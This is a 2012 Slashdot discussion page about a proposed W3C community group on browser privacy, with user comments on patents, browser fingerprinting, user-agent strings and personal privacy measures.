Become a fan of Slashdot on Facebook

 



Forgot your password?
typodupeerror
×
Privacy Security Software The Internet

W3C Group Proposed To Safeguard User Agent State Privacy 76

First time accepted submitter FredAndrews writes "A Private User Agent W3C Community Group has been proposed to tackle the privacy of the web browser by developing technical solutions to close the leaks. Current Javascript APIs are capable of leaking a lot of information as we browse the Internet, such as details of our browser that can be used to identify and track our online presence, and the content on the page (including any private customizations and the effects of extensions), and can monitor and leak our usage on the page such a mouse movements and interactions on the page. This problem is compounded by the increased use of the web browser as a platform for delivering software. While the community ignores the issue, solutions are being developed commercially and patented — we run the risk of ending up unable to have privacy because the solutions are patented. The proposed W3C PUA CG proposes to address the problem with technical solutions at the web browser, such as restricting the back channels available to Javascript, and also by proposing HTML extensions to mitigate lost functionality. Note, this work cannot address the privacy of information that we overtly share, and there are other current W3C initiatives working on this, such as DNT."
This discussion has been archived. No new comments can be posted.

W3C Group Proposed To Safeguard User Agent State Privacy

Comments Filter:
  • want to be private (Score:2, Insightful)

    by ozduo ( 2043408 ) on Saturday September 22, 2012 @08:33PM (#41424825)
    don't visit the internet
  • by Taco Cowboy ( 5327 ) on Saturday September 22, 2012 @08:40PM (#41424855) Journal

    The patent system was set up to encourage more people to invent new stuffs - by protecting the interest of the inventor.

    It was never intended for the restriction of the rights of others to protect themselves.

    The use of patent in the solutions as outlined by TFA is another clear cut example of the abuse of the patent system.

    I do not know how much more the world must suffer before the power that be wakes up to the fact that the patent system is hopelessly broken.

    Overhaul the patent system now !

  • by Skapare ( 16644 ) on Saturday September 22, 2012 @09:37PM (#41425159) Homepage

    Browsers had a lot of bad things done in them over the years. These should just be removed. Start with the Referer (regardless of spelling) field. If the domain is different, don't transmit it. Of course this only scratches the surface. When the user visits another domain, launch a whole new browser in a separate process. Also, do not expose data to a page's client side code about things like navigation to other pages when they are done in different tabs or windows. And when returning the view back to a previously viewed page, just view the previous contents ... do NOT reload the page. The only time a page should be reloaded is when the user navigates to it via a link, or presses reload, or the client code for that page requests reloading only itself or a page in the same directory.

    Yeah, they can break a lot of functionality that dumb web developers came to depend on. But these are things that never should have been there to begin with.

  • by Penurious Penguin ( 2687307 ) on Saturday September 22, 2012 @10:00PM (#41425259) Journal
    First, http://www.techdirt.com/articles/20120920/23570020453/when-even-hilarious-web-comic-artists-are-mocking-insanity-patent-system.shtml [techdirt.com]

    Admitting my primitive understanding of this subject, I have some questions; Is sandboxing undervalued? is sending all cache to unique directories that can only be read by the source they were created for practical? Would generating random or shared generic user-agent data for each domain for each encounter have any effect? I have taken simple privacy measures like chmod 400 ~/.macromedia and ~/.adobe; installing noscript, flashblock; bloating /etc/hosts with loopback redirects, thrashed around in about:config, piously used bleachbit, etc.-- but I guess there are still kissmetrics and other mysterious things to deal with.

    I remember trying the EFF's panopticlick [eff.org], which tests your browser for its unique fingerprint. I was a little surprised at the results. What does something like the time-stamp mean for anonymity? How many people in the world have identical installation times and zip-codes, etc.? Why does this and other data need to be there as it is?

    I get confused when contemplating why such promiscuous features are included in browsers in the first place. Are we simply using stupid browsers? Would creating a secure browser break its functionality? I know noscript can be a pain in the ass. What really confuses me is why a browser would store persistent cookies and other data -- after being deleted -- unless it was built to do so. If so, then why? If not, then why? When I start a browser from a fresh install or USB, it works just fine. If I reboot and do it again, it continues to work fine. Why the persistent data?

    Finally, it should be alarming in itself that so much knowledge is required now to have even a measure of privacy. Those who understand, often take their knowledge for granted. But even for someone practically living and working in the web, it is not an overly simple subject. Is privacy an esoteric delusion, or is it an esoteric reality?
  • by flimflammer ( 956759 ) on Sunday September 23, 2012 @01:10AM (#41426011)

    Who the hell cares who wrote the book at that point? Some people seriously don't think about the consequences of a no copyright no patent environment. If there was absolutely no copyright or patents, the moment someone low in the food chain comes up with something, he can't do anything with it without risking losing it forever. What the hell incentive does he have to anything with it? What the hell reason does anyone have to invest in R&D when someone can just jump in and take the final result and run with it? Do you think we as a people will seriously go "Well they came up with it first, so I'm going to buy their product" when the competitor is offering the same thing at a drastically lower price since they don't have the price of the past R&D to consider?

    Yes, patents are abused and the system is currently absurd. Yes, copyright is abused and the system is currently absurd. (90+ year terms? Come on now.) But removing the systems completely instead of making them better makes no goddamn sense.

  • by jd ( 1658 ) <(imipak) (at) (yahoo.com)> on Sunday September 23, 2012 @01:49AM (#41426197) Homepage Journal

    The browser string helps to identify if the browser can perform certain functions. So send a string that specifies "server-visible capabilities" (ie: what the user wants the server to know about the capabilities of the browser) instead. Then no browser, OS or other potential privacy loopholes exist.

    But what if you don't want the server to know anything? That's the point about sending a capabilities string. If you don't want to specify, there's no need to. Having said that, setting a bit that indicates "HTML 4.01-compliant" is not revealing anything terribly informative to anyone, since that's going to be true of 99% of user agents at this point. Which means you're not part of the 1%, but that's about it.

    HTML 5 is the only awkweird one, as you'd have to have a bit for some generally-agreed group of functions, since there's no fixed standard. (IIRC, that's going to switch to having a "rolling development branch" and fixed "stable snapshots", but for now there's no stable spec you can identify with a simple flag.)

    True, some browsers implement subsets (and/or extensions to) approved standards, but frankly the headache for developers is to support those kinds of freaks. A fixed list of supported standards you can switch between is really what you want. Special cases for every browser make for something that is unmaintainable, as anyone who has developed a web app can tell you. Freak cases really should be reduced to "nearest available standard" where at all possible.

    This satisfies all the requirements of the server, for behaving correctly on multiple browsers, without giving anything away that could be misused.

    Furthermore, since I'm saying the capabilities string is a bunch of flags, you can specify masks per site or site grouping if you want to conceal some information from some servers. (This makes user tracking via the agent impossible, since the agent can now vary and there's fine-grained control over how it varies.) Not a million miles from how security is handled in every other case.

  • by Decker-Mage ( 782424 ) <brian.bartlett@gmail.com> on Sunday September 23, 2012 @04:30AM (#41426659)
    Actually it's being demonstrated all the time with authors having freely downloadable books online yet people pay for them anyway to support their favorite authors. Toss in KickStarter and the like, music groups similarly getting paid for limited performances, etc. It's been shown time and again that the gatekeepers are exactly that, people supposedly with the knowledge to select the annointed and we pay for the privilege of supporting them in that role. Well, it isn't the middle ages nor the industrial age. It's the information age and I demonstrate, as do many others, that I'm willing to pay to support my entertainers.

After an instrument has been assembled, extra components will be found on the bench.

Working...